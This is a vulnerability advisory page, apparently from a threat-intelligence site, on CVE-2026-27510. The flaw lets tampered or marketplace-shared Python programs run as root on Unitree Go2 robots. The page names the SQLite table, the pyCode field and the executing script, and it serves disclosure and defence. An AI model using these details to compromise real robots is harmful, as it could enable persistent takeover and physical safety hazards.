CVE-2026-27510: CWE-345 Insufficient Verification of Data Authenticity in UnitreeRobotics Unitree Go2
Unitree Go2 firmware versions 1.1.7 through 1.1.11, when used with the Unitree Go2 Android application (com.unitree.doggo2), are vulnerable to remote code execution due to missing integrity protection and validation of user-created programmes. The Android application stores programs in a local SQLite database (unitree_go2.db, table dog_programme) and transmits the programme_text content, including the pyCode field, to the robot. The robot's actuator_manager.py executes the supplied Python as root without integrity verification or content validation. An attacker with local access to the Android device can tamper with the stored programme record to inject arbitrary Python that executes when the user triggers the program via a controller keybinding, and the malicious binding persists across reboots. Additionally, a malicious program shared through the application's community marketplace can result in arbitrary code execution on any robot that imports and runs it.
AI Analysis
Technical Summary
CVE-2026-27510 is a vulnerability in UnitreeRobotics' Unitree Go2 robots running firmware versions 1.1.7 through 1.1.11 in conjunction with the Unitree Go2 Android application (com.unitree.doggo2). The root cause is insufficient verification of data authenticity (CWE-345) in the handling of user-created programs. The Android app stores these programs in a local SQLite database (unitree_go2.db, dog_programme table) and transmits the program_text content, including a pyCode field, to the robot. The robot’s actuator_manager.py script executes the supplied Python code as root without performing integrity verification or content validation. This design flaw allows an attacker with local access to the Android device to tamper with the stored program record, injecting arbitrary Python code that executes when the user triggers the program via a controller keybinding. The malicious binding persists across robot reboots, enabling persistent compromise. Furthermore, the app includes a community marketplace feature where users can share programs; a malicious program shared here can lead to arbitrary code execution on any robot that imports and runs it. The vulnerability requires no privileges or authentication but does require user interaction to trigger the malicious program. The CVSS 4.0 vector is AV:N/AC:L/PR:N/UI:A/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H, scoring 6.4 (medium). No patches or known exploits are currently available. This vulnerability exposes robots to remote code execution risks, potentially compromising the robot’s control and underlying system integrity.
Potential Impact
The vulnerability allows remote code execution on Unitree Go2 robots with minimal attacker prerequisites, posing significant risks to confidentiality, integrity, and availability. An attacker can execute arbitrary Python code as root, potentially taking full control of the robot’s systems, manipulating actuators, or disrupting operations. Persistent malicious bindings surviving reboots increase the risk of long-term compromise. Organizations deploying these robots in sensitive environments—such as research labs, industrial automation, or security applications—face risks of operational disruption, data leakage, or physical safety hazards. The ability to distribute malicious programs via the community marketplace further amplifies the threat by enabling supply-chain style attacks affecting multiple robots globally. Although exploitation requires local access to the Android device or user interaction, the widespread use of shared programs and potential for insider threats or compromised devices increases the attack surface. The medium CVSS score reflects the balance between ease of exploitation and required user interaction, but the impact on critical robotic functions can be severe.
Mitigation Recommendations
To mitigate this vulnerability, organizations should implement the following specific measures: 1) Restrict physical and local access to Android devices controlling Unitree Go2 robots to trusted personnel only, employing device-level authentication and encryption. 2) Disable or tightly control the community marketplace feature within the app to prevent importing untrusted or unverified programs. 3) Implement application-layer integrity checks by validating program signatures or hashes before execution, if possible, or request the vendor to provide firmware/app updates that enforce such validation. 4) Monitor and audit program records in the local SQLite database for unauthorized modifications, using file integrity monitoring tools or custom scripts. 5) Educate users to avoid running untrusted programs and to report suspicious behavior promptly. 6) Segregate robot control networks from general enterprise networks to limit remote attack vectors. 7) Engage with UnitreeRobotics for firmware updates or patches addressing this vulnerability and apply them promptly once available. 8) Consider deploying endpoint protection solutions on Android devices to detect tampering or malware. These targeted mitigations go beyond generic advice by focusing on the unique attack vectors and persistence mechanisms of this vulnerability.
Affected Countries
United States, China, Germany, Japan, South Korea, United Kingdom, France, Canada, Australia, Singapore
CVE-2026-27510: CWE-345 Insufficient Verification of Data Authenticity in UnitreeRobotics Unitree Go2
Description
Unitree Go2 firmware versions 1.1.7 through 1.1.11, when used with the Unitree Go2 Android application (com.unitree.doggo2), are vulnerable to remote code execution due to missing integrity protection and validation of user-created programmes. The Android application stores programs in a local SQLite database (unitree_go2.db, table dog_programme) and transmits the programme_text content, including the pyCode field, to the robot. The robot's actuator_manager.py executes the supplied Python as root without integrity verification or content validation. An attacker with local access to the Android device can tamper with the stored programme record to inject arbitrary Python that executes when the user triggers the program via a controller keybinding, and the malicious binding persists across reboots. Additionally, a malicious program shared through the application's community marketplace can result in arbitrary code execution on any robot that imports and runs it.
AI-Powered Analysis
Technical Analysis
CVE-2026-27510 is a vulnerability in UnitreeRobotics' Unitree Go2 robots running firmware versions 1.1.7 through 1.1.11 in conjunction with the Unitree Go2 Android application (com.unitree.doggo2). The root cause is insufficient verification of data authenticity (CWE-345) in the handling of user-created programs. The Android app stores these programs in a local SQLite database (unitree_go2.db, dog_programme table) and transmits the program_text content, including a pyCode field, to the robot. The robot’s actuator_manager.py script executes the supplied Python code as root without performing integrity verification or content validation. This design flaw allows an attacker with local access to the Android device to tamper with the stored program record, injecting arbitrary Python code that executes when the user triggers the program via a controller keybinding. The malicious binding persists across robot reboots, enabling persistent compromise. Furthermore, the app includes a community marketplace feature where users can share programs; a malicious program shared here can lead to arbitrary code execution on any robot that imports and runs it. The vulnerability requires no privileges or authentication but does require user interaction to trigger the malicious program. The CVSS 4.0 vector is AV:N/AC:L/PR:N/UI:A/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H, scoring 6.4 (medium). No patches or known exploits are currently available. This vulnerability exposes robots to remote code execution risks, potentially compromising the robot’s control and underlying system integrity.
Potential Impact
The vulnerability allows remote code execution on Unitree Go2 robots with minimal attacker prerequisites, posing significant risks to confidentiality, integrity, and availability. An attacker can execute arbitrary Python code as root, potentially taking full control of the robot’s systems, manipulating actuators, or disrupting operations. Persistent malicious bindings surviving reboots increase the risk of long-term compromise. Organizations deploying these robots in sensitive environments—such as research labs, industrial automation, or security applications—face risks of operational disruption, data leakage, or physical safety hazards. The ability to distribute malicious programs via the community marketplace further amplifies the threat by enabling supply-chain style attacks affecting multiple robots globally. Although exploitation requires local access to the Android device or user interaction, the widespread use of shared programs and potential for insider threats or compromised devices increases the attack surface. The medium CVSS score reflects the balance between ease of exploitation and required user interaction, but the impact on critical robotic functions can be severe.
Mitigation Recommendations
To mitigate this vulnerability, organizations should implement the following specific measures: 1) Restrict physical and local access to Android devices controlling Unitree Go2 robots to trusted personnel only, employing device-level authentication and encryption. 2) Disable or tightly control the community marketplace feature within the app to prevent importing untrusted or unverified programs. 3) Implement application-layer integrity checks by validating program signatures or hashes before execution, if possible, or request the vendor to provide firmware/app updates that enforce such validation. 4) Monitor and audit program records in the local SQLite database for unauthorized modifications, using file integrity monitoring tools or custom scripts. 5) Educate users to avoid running untrusted programs and to report suspicious behavior promptly. 6) Segregate robot control networks from general enterprise networks to limit remote attack vectors. 7) Engage with UnitreeRobotics for firmware updates or patches addressing this vulnerability and apply them promptly once available. 8) Consider deploying endpoint protection solutions on Android devices to detect tampering or malware. These targeted mitigations go beyond generic advice by focusing on the unique attack vectors and persistence mechanisms of this vulnerability.
Technical Details
- Data Version
- 5.2
- Assigner Short Name
- VulnCheck
- Date Reserved
- 2026-02-19T19:51:07.327Z
- Cvss Version
- 4.0
- State
- PUBLISHED
Threat ID: 69a0a43885912abc71d61abb
Added to database: 2/26/2026, 7:51:20 PM
Last enriched: 2/26/2026, 9:48:51 PM
Last updated: 2/27/2026, 2:24:49 AM
Views: 5
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Related Threats
CVE-2026-3274: Buffer Overflow in Tenda F453
HighCVE-2026-3037: CWE-78 in Copeland Copeland XWEB 300D PRO
HighCVE-2026-25721: CWE-78 in Copeland Copeland XWEB 300D PRO
HighCVE-2026-25196: CWE-78 in Copeland Copeland XWEB 300D PRO
HighCVE-2026-25105: CWE-78 in Copeland Copeland XWEB 300D PRO
HighActions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
Need more coverage?
Upgrade to Pro Console in Console -> Billing for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.
Latest Threats
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.